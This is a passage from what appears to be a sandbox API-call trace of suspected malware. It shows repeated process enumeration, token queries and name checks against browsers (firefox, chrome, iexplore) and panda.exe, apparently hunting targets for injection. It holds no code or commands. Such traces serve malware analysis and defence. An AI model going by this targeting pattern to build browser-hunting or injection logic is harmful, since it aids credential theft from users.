dwProcessId=0x590) returned 0x1cc [0122.453] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.453] CloseHandle (hObject=0x1cc) returned 1 [0122.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0122.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0122.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x1cc [0122.453] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.453] CloseHandle (hObject=0x1cc) returned 1 [0122.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x1cc [0122.454] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.454] CloseHandle (hObject=0x1cc) returned 1 [0122.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0122.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0122.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x1cc [0122.454] IsWow64Process (in: hProcess=0x1cc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0122.454] CloseHandle (hObject=0x1cc) returned 1 [0122.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x1cc [0122.455] OpenProcessToken (in: ProcessHandle=0x1cc, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2d4) returned 1 [0122.455] GetTokenInformation (in: TokenHandle=0x2d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0122.455] GetLastError () returned 0x7a [0122.455] GetTokenInformation (in: TokenHandle=0x2d4, TokenInformationClass=0x1, TokenInformation=0x5403100, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x5403100, ReturnLength=0x755fb14) returned 1 [0122.455] GetTokenInformation (in: TokenHandle=0x2d4, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0122.455] CloseHandle (hObject=0x2d4) returned 1 [0122.455] CloseHandle (hObject=0x1cc) returned 1 [0122.455] GetLengthSid (pSid=0x5403108) returned 0x1c [0122.456] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0122.456] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0122.456] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0122.456] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0122.457] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0123.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x113f0) returned 0xc0000004 [0123.468] VirtualAlloc (lpAddress=0x0, dwSize=0x123f0, flAllocationType=0x1000, flProtect=0x4) returned 0x55d0000 [0123.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x55d0000, Length=0x123f0, ResultLength=0x0 | out: SystemInformation=0x55d0000, ResultLength=0x0) returned 0x0 [0123.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0123.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0123.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0123.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2fc [0123.475] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.475] CloseHandle (hObject=0x2fc) returned 1 [0123.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2fc [0123.476] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.476] CloseHandle (hObject=0x2fc) returned 1 [0123.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2fc [0123.476] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.476] CloseHandle (hObject=0x2fc) returned 1 [0123.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2fc [0123.476] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.476] CloseHandle (hObject=0x2fc) returned 1 [0123.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2fc [0123.477] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.477] CloseHandle (hObject=0x2fc) returned 1 [0123.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2fc [0123.477] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.477] CloseHandle (hObject=0x2fc) returned 1 [0123.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2fc [0123.477] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.477] CloseHandle (hObject=0x2fc) returned 1 [0123.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0123.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0123.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2fc [0123.478] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.478] CloseHandle (hObject=0x2fc) returned 1 [0123.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2fc [0123.478] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.478] CloseHandle (hObject=0x2fc) returned 1 [0123.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0123.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0123.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2fc [0123.479] IsWow64Process (in: hProcess=0x2fc, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0123.479] CloseHandle (hObject=0x2fc) returned 1 [0123.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2fc [0123.479] OpenProcessToken (in: ProcessHandle=0x2fc, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x3a4) returned 1 [0123.479] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0123.479] GetLastError () returned 0x7a [0123.480] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0x1, TokenInformation=0x54015a8, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54015a8, ReturnLength=0x755fb14) returned 1 [0123.480] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0123.480] CloseHandle (hObject=0x3a4) returned 1 [0123.480] CloseHandle (hObject=0x2fc) returned 1 [0123.480] GetLengthSid (pSid=0x54015b0) returned 0x1c [0123.480] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0123.480] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0123.480] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0123.480] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0123.481] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0124.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x113f0) returned 0xc0000004 [0124.500] VirtualAlloc (lpAddress=0x0, dwSize=0x123f0, flAllocationType=0x1000, flProtect=0x4) returned 0x77e0000 [0124.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x77e0000, Length=0x123f0, ResultLength=0x0 | out: SystemInformation=0x77e0000, ResultLength=0x0) returned 0x0 [0124.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0124.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0124.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0124.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0124.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0124.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0124.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0124.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0124.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0124.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0124.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3c4 [0124.523] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.524] CloseHandle (hObject=0x3c4) returned 1 [0124.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x3c4 [0124.524] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.524] CloseHandle (hObject=0x3c4) returned 1 [0124.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3c4 [0124.524] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.524] CloseHandle (hObject=0x3c4) returned 1 [0124.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x3c4 [0124.525] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.525] CloseHandle (hObject=0x3c4) returned 1 [0124.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x3c4 [0124.525] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.525] CloseHandle (hObject=0x3c4) returned 1 [0124.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x3c4 [0124.525] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.526] CloseHandle (hObject=0x3c4) returned 1 [0124.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x3c4 [0124.526] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.526] CloseHandle (hObject=0x3c4) returned 1 [0124.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0124.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0124.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x3c4 [0124.527] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.527] CloseHandle (hObject=0x3c4) returned 1 [0124.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x3c4 [0124.527] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.527] CloseHandle (hObject=0x3c4) returned 1 [0124.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0124.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0124.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x3c4 [0124.528] IsWow64Process (in: hProcess=0x3c4, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0124.528] CloseHandle (hObject=0x3c4) returned 1 [0124.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x3c4 [0124.528] OpenProcessToken (in: ProcessHandle=0x3c4, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x3c8) returned 1 [0124.528] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0124.528] GetLastError () returned 0x7a [0124.528] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x54015a8, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54015a8, ReturnLength=0x755fb14) returned 1 [0124.528] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0124.528] CloseHandle (hObject=0x3c8) returned 1 [0124.529] CloseHandle (hObject=0x3c4) returned 1 [0124.529] GetLengthSid (pSid=0x54015b0) returned 0x1c [0124.529] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0124.529] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0124.529] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0124.529] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0124.530] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0125.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11530) returned 0xc0000004 [0125.539] VirtualAlloc (lpAddress=0x0, dwSize=0x12530, flAllocationType=0x1000, flProtect=0x4) returned 0x78e0000 [0125.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x78e0000, Length=0x12530, ResultLength=0x0 | out: SystemInformation=0x78e0000, ResultLength=0x0) returned 0x0 [0125.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0125.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0125.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0125.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0125.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x688 [0125.546] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.546] CloseHandle (hObject=0x688) returned 1 [0125.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x688 [0125.546] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.546] CloseHandle (hObject=0x688) returned 1 [0125.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x688 [0125.546] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.546] CloseHandle (hObject=0x688) returned 1 [0125.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x688 [0125.547] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.547] CloseHandle (hObject=0x688) returned 1 [0125.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x688 [0125.547] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.547] CloseHandle (hObject=0x688) returned 1 [0125.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x688 [0125.547] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.547] CloseHandle (hObject=0x688) returned 1 [0125.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x688 [0125.547] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.548] CloseHandle (hObject=0x688) returned 1 [0125.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0125.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0125.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x688 [0125.548] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.548] CloseHandle (hObject=0x688) returned 1 [0125.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x688 [0125.548] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.548] CloseHandle (hObject=0x688) returned 1 [0125.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0125.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0125.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x688 [0125.549] IsWow64Process (in: hProcess=0x688, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0125.549] CloseHandle (hObject=0x688) returned 1 [0125.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x688 [0125.549] OpenProcessToken (in: ProcessHandle=0x688, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x694) returned 1 [0125.549] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0125.549] GetLastError () returned 0x7a [0125.549] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x1, TokenInformation=0x54015a8, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54015a8, ReturnLength=0x755fb14) returned 1 [0125.550] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0125.550] CloseHandle (hObject=0x694) returned 1 [0125.550] CloseHandle (hObject=0x688) returned 1 [0125.550] GetLengthSid (pSid=0x54015b0) returned 0x1c [0125.550] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0125.550] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0125.550] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0125.550] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0125.551] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0126.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11530) returned 0xc0000004 [0126.612] VirtualAlloc (lpAddress=0x0, dwSize=0x12530, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0126.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12530, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0126.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0126.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0126.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0126.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0126.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0126.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0126.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0126.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x634 [0126.619] IsWow64Process (in: hProcess=0x634, Wow64Process=0x755fb30 